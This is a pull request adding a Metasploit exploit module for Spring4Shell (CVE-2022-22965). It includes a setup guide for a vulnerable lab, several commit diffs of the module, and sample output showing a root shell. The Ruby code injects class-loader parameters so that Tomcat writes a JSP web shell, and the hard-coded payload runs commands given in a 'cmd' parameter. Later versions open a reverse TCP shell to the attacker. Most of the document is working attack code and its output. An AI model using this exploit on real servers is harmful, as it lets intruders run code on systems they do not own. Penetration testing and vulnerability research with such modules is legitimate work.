### PR TITLE
Added module for spring4shell (CVE-2022-22965)

### DIFF
--- a/documentation/modules/exploit/multi/http/spring4shell_rce.md
+++ b/documentation/modules/exploit/multi/http/spring4shell_rce.md
@@ -1,0 +1,219 @@
+## Vulnerable Application
+
+### Description
+
+The vulnerability impacts Spring MVC and Spring WebFlux applications running on JDK 9+. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
+
+### Setup
+
+Clone vanila spring application `git clone https://spring.io/guides/gs/handling-form-submission/`
+get into the directory `handling-form-submission/complete/`
+
+Change the files as follow
+
+<details>
+<summary>pom.xml</summary>
+<p>
+
+```diff
+--- a/complete/pom.xml
++++ b/complete/pom.xml
+@@ -8,6 +8,7 @@
+                <version>2.6.3</version>
+                <relativePath/> <!-- lookup parent from repository -->
+        </parent>
++       <packaging>war</packaging>
+        <groupId>com.example</groupId>
+        <artifactId>handling-form-submission-complete</artifactId>
+        <version>0.0.1-SNAPSHOT</version>
+@@ -20,24 +21,35 @@
+                <dependency>
+                        <groupId>org.springframework.boot</groupId>
+                        <artifactId>spring-boot-starter-thymeleaf</artifactId>
++                       <version>2.6.3</version>
+                </dependency>
+                <dependency>
+                        <groupId>org.springframework.boot</groupId>
+                        <artifactId>spring-boot-starter-web</artifactId>
++                        <version>2.6.3</version>
+                </dependency>
+
+                <dependency>
+                        <groupId>org.springframework.boot</groupId>
+                        <artifactId>spring-boot-starter-test</artifactId>
++                        <version>2.6.3</version>
+                        <scope>test</scope>
+                </dependency>
++               <dependency>
++                       <groupId>org.springframework.boot</groupId>
++                       <artifactId>spring-boot-starter-tomcat</artifactId>
++                       <version>2.6.3</version>
++                       <scope>provided</scope>
++               </dependency>
+        </dependencies>
+
+        <build>
++               <finalName>handlingformsubmission</finalName>
+                <plugins>
+                        <plugin>
+                                <groupId>org.springframework.boot</groupId>
+                                <artifactId>spring-boot-maven-plugin</artifactId>
++                                <version>2.6.3</version>
+                        </plugin>
+                </plugins>
+        </build>
+```
+
+</p>
+</details>
+
+
+
+<details>
+<summary>HandlingFormSubmissionApplication.java</summary>
+<p>
+
+
+```diff
+--- a/complete/src/main/java/com/example/handlingformsubmission/HandlingFormSubmissionApplication.java
++++ b/complete/src/main/java/com/example/handlingformsubmission/HandlingFormSubmissionApplication.java
+@@ -2,9 +2,10 @@ package com.example.handlingformsubmission;
+
+ import org.springframework.boot.SpringApplication;
+ import org.springframework.boot.autoconfigure.SpringBootApplication;
++import org.springframework.boot.web.servlet.support.SpringBootServletInitializer;
+
+ @SpringBootApplication
+-public class HandlingFormSubmissionApplication {
++public class HandlingFormSubmissionApplication extends SpringBootServletInitializer {
+
+        public static void main(String[] args) {
+                SpringApplication.run(HandlingFormSubmissionApplication.class, args);
+```
+
+</p>
+</details>
+
+Create a Dockerfile in the same directory
+
+```Dockerfile
+FROM tomcat:9.0.59-jdk11
+
+ADD src/ /root/src
+ADD pom.xml /root
+
+#  Build spring app
+RUN apt update && apt install maven -y
+WORKDIR /root/
+RUN mvn clean package
+
+#  Deploy to tomcat
+RUN mv target/handlingformsubmission.war /usr/local/tomcat/webapps/
+
+WORKDIR /usr/local/tomcat/
+
+EXPOSE 8080
+CMD ["catalina.sh", "run"]
+```
+Build an image
+
+```bash
+docker build --rm --no-cache -t spring4shell .
+```
+
+Run a container
+
+```bash
+dodocker run --rm -it -p 9090:8080 spring4shell
+```
+
+The application must be avaliable at `http://localhost:9090/handlingformsubmission/greeting`
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+`vRealize Operations Manager < 8.3.0`
+
+
+### Version and OS
+This module has been tested successfully on Apache Tomcat 9.0.59, Openjdk 11.0.14.1 and spring-webmvc-5.3.15
+
+
+## Verification Steps
+Confirm that functionality works:
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/spring4shell_rce`
+3. set `RHOSTS`, `RPORT` and `TARGETURI`
+4. Confirm the target is vulnerable: `check`
+5. It come already with a default payload `java/jsp_shell_reverse_tcp`
+7. set `LHOST` and `LPORT`
+8. `exploit`
+9. Confirm you have now a cmd session
+
+## Options
+
+### TARGETURI (required)
+
+The path to the Spring application running on Tomcat. By default, the path is  `/`.
+
+### PAYLOAD_PATH (required)
+
+The path to write the payload (Default: `webapps/ROOT`).
+
+
+## Scenarios Spring Web 5.3.15 Openjdk 11
+```
+msf6 exploit(multi/http/spring4shell_rce) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Resetting Log Variables
+[*] Modifying Log Configurations
+[*] Send the packet that writes the web shell
+[*] Executing JSP payload
+[*] http://127.0.0.1:9090/helloworld/greeting/o39jGjG4q4Pje.jsp
+[!] Tried to delete o39jGjG4q4Pje.jsp, unknown result
+[*] Command shell session 2 opened (192.168.137.1:4444 -> 192.168.137.1:52314 ) at 2022-04-06 23:04:00 +0200
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+
+java --version
+openjdk 11.0.14.1 2022-02-08
+OpenJDK Runtime Environment 18.9 (build 11.0.14.1+1)
+OpenJDK 64-Bit Server VM 18.9 (build 11.0.14.1+1, mixed mode, sharing)
+
+ls -l /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring*
+-rw-r----- 1 root root  382856 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-aop-5.3.15.jar
+-rw-r----- 1 root root  697431 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-beans-5.3.15.jar
+-rw-r----- 1 root root 1423985 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-boot-2.6.3.jar
+-rw-r----- 1 root root 1627754 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-boot-autoconfigure-2.6.3.jar
+-rw-r----- 1 root root   29397 Feb  1  1980 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-boot-jarmode-layertools-2.6.3.jar
+-rw-r----- 1 root root 1271872 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-context-5.3.15.jar
+-rw-r----- 1 root root 1480617 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-core-5.3.15.jar
+-rw-r----- 1 root root  288784 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-expression-5.3.15.jar
+-rw-r----- 1 root root   24440 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-jcl-5.3.15.jar
+-rw-r----- 1 root root 1638528 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-web-5.3.15.jar
+-rw-r----- 1 root root 1028435 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-webmvc-5.3.15.jar
+
+java -cp /usr/local/tomcat/lib/catalina.jar org.apache.catalina.util.ServerInfo
+Server version: Apache Tomcat/9.0.59
+Server built:   Feb 21 2022 21:01:10 UTC
+Server number:  9.0.59.0
+OS Name:        Linux
+OS Version:     5.10.60.1-microsoft-standard-WSL2
+Architecture:   amd64
+JVM Version:    11.0.14.1+1
+JVM Vendor:     Oracle Corporation
+
+exit
+[*] 127.0.0.1 - Command shell session 2 closed.
+msf6 exploit(multi/http/spring4shell_rce) > 
+```

--- a/modules/exploits/multi/http/spring4shell_rce.rb
+++ b/modules/exploits/multi/http/spring4shell_rce.rb
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2022-22965'],
-          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']
+          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965'],
+          ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement']
         ],
         'DisclosureDate' => '2022-03-30',
         'License' => MSF_LICENSE,
@@ -53,7 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Base path', '/'])
+      OptString.new('TARGETURI', [true, 'Application path', '/']),
+      OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT'])
     ])
   end
 
@@ -69,6 +71,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Safe unless res.code == 400
 
+    # setting the default assertion status to a valid status
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'data' => "class.module.classLoader.DefaultAssertionStatus=true"
+    )
     Exploit::CheckCode::Appears
   end
 
@@ -91,10 +99,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=#{Rex::Text.uri_encode(stub)}"
 
-    # filename = rand_text_alphanumeric(8..16)
-    directory = 'webapps/ROOT'
+    # directory = 'webapps/ROOT'
     log_file_suffix = 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp'
-    log_file_dir = "class.module.classLoader.resources.context.parent.pipeline.first.directory=#{directory}"
+    log_file_dir = "class.module.classLoader.resources.context.parent.pipeline.first.directory=#{datastore['PAYLOAD_PATH']}"
     log_file_prefix = "class.module.classLoader.resources.context.parent.pipeline.first.prefix=#{jsp_filename.split('.').first}"
     log_file_date_format = 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='
 
@@ -147,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_jsp_payload
-    jsp_uri = normalize_uri(target_uri.path, jsp_filename)
+    jsp_uri = normalize_uri(datastore['PAYLOAD_PATH'], jsp_filename)
 
     print_status('Executing JSP payload')
     vprint_status(full_uri(jsp_uri))

--- a/modules/exploits/multi/http/spring4shell_rce.rb
+++ b/modules/exploits/multi/http/spring4shell_rce.rb
@@ -84,6 +84,64 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20" \
+    "java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter" \
+    "(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B" \
+    "%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
+
+    filename = Rex::Text.rand_text_alpha_lower(4..6)
+    directory = 'webapps/ROOT'
+    log_file_suffix = "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
+    log_file_dir = "class.module.classLoader.resources.context.parent.pipeline.first.directory=#{directory}"
+    log_file_prefix = "class.module.classLoader.resources.context.parent.pipeline.first.prefix=#{filename}"
+    log_file_date_format = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
+
+    exp_data = [log_pattern, log_file_suffix, log_file_dir, log_file_prefix, log_file_date_format].join('&')
+
+    puts exp_data
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'headers' => {
+        'Accept-Encoding' => 'gzip, deflate',
+        'Accept' => '*/*'
+      },
+      'data' => exp_data
+    )
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'headers' => {
+        'Accept-Encoding' => 'gzip, deflate',
+        'Accept' => '*/*',
+        'prefix' => '<%',
+        'suffix' => '%>//',
+        'c' =>  'Runtime',
+      }
+    )
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'headers' => {
+        'Accept-Encoding' => 'gzip, deflate',
+        'Accept' => '*/*'
+      },
+      'data' => 'class.module.classLoader.resources.context.parent.pipeline.first.pattern='
+    )
+
+    
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, filename),
+    )
+
+    puts res.code
+
+
   end
    
 end

--- a/modules/exploits/multi/http/spring4shell_rce.rb
+++ b/modules/exploits/multi/http/spring4shell_rce.rb
@@ -1,0 +1,89 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Spring Framework RCE via Data Binding',
+        'Description' => %q{
+          A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE)
+          via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the
+          application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit.
+          However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
+        },
+        'Author' => [
+          'helloexp', # vulnerability discovery
+          'Heyder Andrade'
+        ],
+        'References' => [
+          ['CVE', '2022-22965'],
+          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']
+        ],
+        'DisclosureDate' => '2022-03-30',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'AKA' => [ 'SpringShell', 'Spring4Shell' ],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'data' => "class.module.classLoader.DefaultAssertionStatus=#{Rex::Text.rand_text_alpha_lower(4..6)}"
+    )
+
+    return CheckCode::Unknown unless res
+
+    return CheckCode::Safe unless res.code == 400
+   
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+  end
+   
+end

--- a/modules/exploits/multi/http/spring4shell_rce.rb
+++ b/modules/exploits/multi/http/spring4shell_rce.rb
@@ -9,7 +9,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  # include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -32,28 +33,16 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2022-03-30',
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => 'linux',
+        'Arch' => ARCH_JAVA,
         'Privileged' => false,
         'Targets' => [
-          [
-            'Unix Command',
-            {
-              'Platform' => 'unix',
-              'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :linux_dropper
-            }
-          ]
+          ['Java Generic', {}]
         ],
-        'DefaultTarget' => 1,
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
         'Notes' => {
           'AKA' => [ 'SpringShell', 'Spring4Shell' ],
           'Stability' => [CRASH_SAFE],
@@ -74,56 +63,51 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(datastore['TARGETURI']),
       'data' => "class.module.classLoader.DefaultAssertionStatus=#{Rex::Text.rand_text_alpha_lower(4..6)}"
     )
-
+    # TODO - get tomcat version and test GET as well
+    # if res && res.code == 400 && res.body.include?('Apache Tomcat')
     return CheckCode::Unknown unless res
 
     return CheckCode::Safe unless res.code == 400
-   
+
     Exploit::CheckCode::Appears
   end
 
   def exploit
-    # print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
-    log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20" \
-    "java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter" \
-    "(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B" \
-    "%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
 
-    filename = Rex::Text.rand_text_alpha_lower(4..6)
-    directory = 'webapps/ROOT'
-    log_file_suffix = "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
-    log_file_dir = "class.module.classLoader.resources.context.parent.pipeline.first.directory=#{directory}"
-    log_file_prefix = "class.module.classLoader.resources.context.parent.pipeline.first.prefix=#{filename}"
-    log_file_date_format = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
-
-    exp_data = [log_pattern, log_file_suffix, log_file_dir, log_file_prefix, log_file_date_format].join('&')
-
-    @headers = {
-      'Accept-Encoding' => 'gzip, deflate',
-      'Accept' => '*/*'
-    }
-    # puts exp_data
-    trick
+    reset_variables
     # Change the tomcat log location variables
-    change_log exp_data
-    # Changes take some time to populate on tomcat
-    sleep(3)
-
+    change_log formated_payload
     write_payload
-    sleep(1)
-
-    reset_pattern
-    sleep(3)
-    trigger_payload filename
-   
+    # reset_pattern
+    register_files_for_cleanup(jsp_filename)
+    execute_jsp_payload
+    handler
   end
-  def trick
-    vprint_status '>> TRICK <<'
+
+  def formated_payload
+    # rubocop:disable  Style/FormatStringToken
+    stub = payload.raw.gsub('<%', '%{prefix}i').gsub('%>', '%{suffix}i')
+    # rubocop:enable  Style/FormatStringToken
+
+    log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=#{Rex::Text.uri_encode(stub)}"
+
+    # filename = rand_text_alphanumeric(8..16)
+    directory = 'webapps/ROOT'
+    log_file_suffix = 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp'
+    log_file_dir = "class.module.classLoader.resources.context.parent.pipeline.first.directory=#{directory}"
+    log_file_prefix = "class.module.classLoader.resources.context.parent.pipeline.first.prefix=#{jsp_filename.split('.').first}"
+    log_file_date_format = 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='
+
+    [log_pattern, log_file_suffix, log_file_dir, log_file_prefix, log_file_date_format].join('&')
+
+  end
+
+  def reset_variables
+    vprint_status 'Resetting Log Variables'
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI']),
-      'headers' => @headers,
-      'data' => 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_'
+      'data' => 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=.'
     )
   end
 
@@ -132,9 +116,10 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI']),
-      'headers' => @headers,
       'data' => body_data
     )
+    # Changes take some time to populate on tomcat
+    sleep(3)
   end
 
   def write_payload
@@ -142,12 +127,13 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(datastore['TARGETURI']),
-      'headers' => @headers.merge({
+      'headers' => {
         'prefix' => '<%',
         'suffix' => '%>//',
-        'c' =>  'Runtime',
-      })
+        'c' => 'Runtime'
+      }
     )
+    sleep(1)
   end
 
   def reset_pattern
@@ -155,24 +141,28 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI']),
-      'headers' => @headers,
       'data' => 'class.module.classLoader.resources.context.parent.pipeline.first.pattern='
     )
+    sleep(5)
   end
 
-  def trigger_payload(filename)
-    vprint_status 'Triggering the payload'
-    
-    res = send_request_cgi(
+  def execute_jsp_payload
+    jsp_uri = normalize_uri(target_uri.path, jsp_filename)
+
+    print_status('Executing JSP payload')
+    vprint_status(full_uri(jsp_uri))
+
+    sleep(5)
+    res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri("/#{filename}.jsp?cmd=id"),
-    )
+      'uri' => normalize_uri("/#{jsp_filename}")
+    }, 5)
+    fail_with(Failure::UnexpectedReply, "Seems the payload haven't been written") unless res.code.to_i == 200
 
-    vprint_good("succesfully ... /#{filename}.jsp") if res.code.to_i == 200
-  
-    vprint_good(res.body)
-
-    
   end
-   
+
+  def jsp_filename
+    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
+  end
+
 end

--- a/modules/exploits/multi/http/spring4shell_rce.rb
+++ b/modules/exploits/multi/http/spring4shell_rce.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'helloexp', # vulnerability discovery
-          'Heyder Andrade'
+          'Heyder Andrade' # module
         ],
         'References' => [
           ['CVE', '2022-22965'],
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    # print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20" \
     "java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter" \
     "(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B" \
@@ -98,50 +98,81 @@ class MetasploitModule < Msf::Exploit::Remote
 
     exp_data = [log_pattern, log_file_suffix, log_file_dir, log_file_prefix, log_file_date_format].join('&')
 
-    puts exp_data
+    @headers = {
+      'Accept-Encoding' => 'gzip, deflate',
+      'Accept' => '*/*'
+    }
+    # puts exp_data
+    trick
+    # Change the tomcat log location variables
+    change_log exp_data
+    # Changes take some time to populate on tomcat
+    sleep(3)
 
+    write_payload
+    sleep(1)
+
+    reset_pattern
+    sleep(3)
+    trigger_payload filename
+   
+  end
+  def trick
+    vprint_status '>> TRICK <<'
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI']),
-      'headers' => {
-        'Accept-Encoding' => 'gzip, deflate',
-        'Accept' => '*/*'
-      },
-      'data' => exp_data
+      'headers' => @headers,
+      'data' => 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_'
     )
+  end
 
+  def change_log(body_data)
+    vprint_status 'Modifying Log Configurations'
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'headers' => @headers,
+      'data' => body_data
+    )
+  end
+
+  def write_payload
+    vprint_status 'Send the packet that writes the web shell'
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(datastore['TARGETURI']),
-      'headers' => {
-        'Accept-Encoding' => 'gzip, deflate',
-        'Accept' => '*/*',
+      'headers' => @headers.merge({
         'prefix' => '<%',
         'suffix' => '%>//',
         'c' =>  'Runtime',
-      }
+      })
     )
+  end
 
+  def reset_pattern
+    vprint_status 'Reset the pattern to prevent future writes into the file'
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI']),
-      'headers' => {
-        'Accept-Encoding' => 'gzip, deflate',
-        'Accept' => '*/*'
-      },
+      'headers' => @headers,
       'data' => 'class.module.classLoader.resources.context.parent.pipeline.first.pattern='
     )
+  end
 
+  def trigger_payload(filename)
+    vprint_status 'Triggering the payload'
     
-
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, filename),
+      'uri' => normalize_uri("/#{filename}.jsp?cmd=id"),
     )
 
-    puts res.code
+    vprint_good("succesfully ... /#{filename}.jsp") if res.code.to_i == 200
+  
+    vprint_good(res.body)
 
-
+    
   end
    
 end


### PR DESCRIPTION
Added module for spring4shell vulnerability CVE-2022-22965

## Enviorement 
- Clone vanilla spring application `git clone https://spring.io/guides/gs/handling-form-submission/`
- Get into the directory `handling-form-submission/complete/`

- Change the files as follow

<details>
<summary>pom.xml</summary>
<p>

```diff
--- a/complete/pom.xml
+++ b/complete/pom.xml
@@ -8,6 +8,7 @@
                <version>2.6.3</version>
                <relativePath/> <!-- lookup parent from repository -->
        </parent>
+       <packaging>war</packaging>
        <groupId>com.example</groupId>
        <artifactId>handling-form-submission-complete</artifactId>
        <version>0.0.1-SNAPSHOT</version>
@@ -20,24 +21,35 @@
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-thymeleaf</artifactId>
+                       <version>2.6.3</version>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-web</artifactId>
+                        <version>2.6.3</version>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-test</artifactId>
+                        <version>2.6.3</version>
                        <scope>test</scope>
                </dependency>
+               <dependency>
+                       <groupId>org.springframework.boot</groupId>
+                       <artifactId>spring-boot-starter-tomcat</artifactId>
+                       <version>2.6.3</version>
+                       <scope>provided</scope>
+               </dependency>
        </dependencies>

        <build>
+               <finalName>handlingformsubmission</finalName>
                <plugins>
                        <plugin>
                                <groupId>org.springframework.boot</groupId>
                                <artifactId>spring-boot-maven-plugin</artifactId>
+                                <version>2.6.3</version>
                        </plugin>
                </plugins>
        </build>
```

</p>
</details>



<details>
<summary>HandlingFormSubmissionApplication.java</summary>
<p>


```diff
--- a/complete/src/main/java/com/example/handlingformsubmission/HandlingFormSubmissionApplication.java
+++ b/complete/src/main/java/com/example/handlingformsubmission/HandlingFormSubmissionApplication.java
@@ -2,9 +2,10 @@ package com.example.handlingformsubmission;

 import org.springframework.boot.SpringApplication;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
+import org.springframework.boot.web.servlet.support.SpringBootServletInitializer;

 @SpringBootApplication
-public class HandlingFormSubmissionApplication {
+public class HandlingFormSubmissionApplication extends SpringBootServletInitializer {

        public static void main(String[] args) {
                SpringApplication.run(HandlingFormSubmissionApplication.class, args);
```

</p>
</details>

- Create a Dockerfile in the same directory

```Dockerfile
FROM tomcat:9.0.59-jdk11

ADD src/ /root/src
ADD pom.xml /root

#  Build spring app
RUN apt update && apt install maven -y
WORKDIR /root/
RUN mvn clean package

#  Deploy to tomcat
RUN mv target/handlingformsubmission.war /usr/local/tomcat/webapps/

WORKDIR /usr/local/tomcat/

EXPOSE 8080
CMD ["catalina.sh", "run"]
```
- Build an image

```bash
docker build --rm --no-cache -t spring4shell .
```

- Run a container

```bash
dodocker run --rm -it -p 9090:8080 spring4shell
```

The application must be avaliable at `http://localhost:9090/handlingformsubmission/greeting`

### Version and OS
This module has been tested successfully on Apache Tomcat 9.0.59, Openjdk 11.0.14.1 and spring-webmvc-5.3.15


## Verification Steps
Confirm that functionality works:

1. Start `msfconsole`
2. `use exploit/multi/http/spring4shell_rce`
3. set `RHOSTS`, `RPORT` and `TARGETURI`
4. Confirm the target is vulnerable: `check`
5. It come already with a default payload `java/jsp_shell_reverse_tcp`
7. set `LHOST` and `LPORT`
8. `exploit`
9. Confirm you have now a cmd session

## Scenarios Spring Web 5.3.15 Openjdk 11
```
msf6 exploit(multi/http/spring4shell_rce) > exploit 

[*] Started reverse TCP handler on 192.168.137.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Resetting Log Variables
[*] Modifying Log Configurations
[*] Send the packet that writes the web shell
[*] Executing JSP payload
[*] http://127.0.0.1:9090/helloworld/greeting/o39jGjG4q4Pje.jsp
[!] Tried to delete o39jGjG4q4Pje.jsp, unknown result
[*] Command shell session 2 opened (192.168.137.1:4444 -> 192.168.137.1:52314 ) at 2022-04-06 23:04:00 +0200

id
uid=0(root) gid=0(root) groups=0(root)

java --version
openjdk 11.0.14.1 2022-02-08
OpenJDK Runtime Environment 18.9 (build 11.0.14.1+1)
OpenJDK 64-Bit Server VM 18.9 (build 11.0.14.1+1, mixed mode, sharing)

ls -l /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring*
-rw-r----- 1 root root  382856 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-aop-5.3.15.jar
-rw-r----- 1 root root  697431 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-beans-5.3.15.jar
-rw-r----- 1 root root 1423985 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-boot-2.6.3.jar
-rw-r----- 1 root root 1627754 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-boot-autoconfigure-2.6.3.jar
-rw-r----- 1 root root   29397 Feb  1  1980 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-boot-jarmode-layertools-2.6.3.jar
